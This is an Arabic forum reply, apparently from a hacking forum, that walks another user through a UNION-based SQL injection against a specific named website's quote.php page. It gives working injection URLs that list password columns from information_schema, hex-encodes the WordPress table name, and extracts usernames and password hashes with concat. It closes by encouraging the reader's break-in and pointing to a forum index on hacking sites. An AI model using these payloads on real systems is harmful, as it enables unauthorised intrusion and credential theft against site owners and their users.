السلام عليكم
اخي اولا ./
كود:
http://qcsgopc.org/quote.php?ID=13+union+select+1,2,3,concat%28table_name,0x3a,column_name,0x3a,table_schema%29,5+from+information_schema.columns+where+column_name%20+like+char%2837,%20112,%2097,%20115,%20115,%2037%29
الى هنا الحقنــة صحيحــة..
ثانيــا يا اخي ..
كود:
http://qcsgopc.org/quote.php?ID=-13+union+select+1,2,3,wp_posts,5+from+james138
هذا غلــــط ككككككككككككككككككككككككككككككككككككككبير
شوف اخي عندما استخرجت اعمدة الباسورد وهي ..
wp_posts:post_password:james138 wp_users:user_pass:james138 طبعـــا انت استخرجتها بالحنقه الاولى وهي هذه . | اقتباس | | | | | |
طيب لما ظهرت لك الاعمدة او الجداول هذي .
wp_posts:post_password:james138 wp_users:user_pass:james138 اذهــب فــوررأأأ الى هذا المـــوقــع .. وهو موقع التشفير .. http://waraxe.us/sql-char-encoder.html طيب الحين ياغالي تاخذ [ اســم الجدول ] .. وهذا هو wp_posts او wp_users اختر واحد فيهم واذهب الى الى موقع التشفير وضعــه في الموقع حتى يتم تشفيره لكي يستخرج لك عمود اليوزر نيــم ..
وهذه صــورة ياغالي ..
الان عرفنا كيف نشفر .. ^^ طيب انسخ الكلام الي ماشر عليه بالصوره بعد التشفير وضعه بعد الامر هذا .. where+table_name=# مثال .: +where+table_name=0x77705f706f737473 الان انسخ الامر كامل ..مع الكلام الي شفرناهـ .. واذهب الى الحقنـه هذه .. | اقتباس | | | | | |
وامــســح هذا الامر تبع الباسورد
where+column_name +like+char(37, 112, 97, 115, 115, 37)
وضــع هذا الامر ..
+where+table_name=0x77705f706f737473
ولا تنسى ان تضع هذا [ -- ] او iهذا [ /* ] اذا كان الموقع لايقبل ..
وبعد ماتفعل سوف يظهر لك اسم اليوزر ..
وهو
post_name
لما يظهر اذهب وضع اسم اليوز في العمود المصاب وسوف يظهر لك اسم صاحب الموقع
او اذا اردت ان يظهر لك الباسورد واليوز مع بعض
اكتب هذا الامر في العمود المصاب ..
Concat(user,0x3a,pass)
ضـع مكان user اسسم اليوزر نيم تبع االموقع الي انت طلعتــه
وضع مكان pass اسم عمود الباسورد الي انت طلعتــه وهو
post_password او user_pass
وفي نهايت الرابط ضــع هذا الاسسم
james138
وهو ياتي دايمــا اخر كلمــه
wp_posts:post_password:james138
ثم اضغط انتر وسوف يظهر لك اليوز والباسورد ..
ومن ثم الاختراق ..
أرجــو إنــك فـهــمت شرحــي وانا انصــحك تتابع هذا الفهرس تبع الاخ [ فلكانو جزاه الله خيرأأ ]
وهو فهرس لإختراق المواقع بثغرات SQL وبإذن الله سوف تصبح محترف ياغالي
وهذا رابط الفهرس هنا بالمنتدى ..
http://www.vbspiders.com/vb/t22432.html
تحياتي لك اخــي الغالي
:00001793[1]:وأختراقات موفقــه بإذن الله .. :00001793[1]: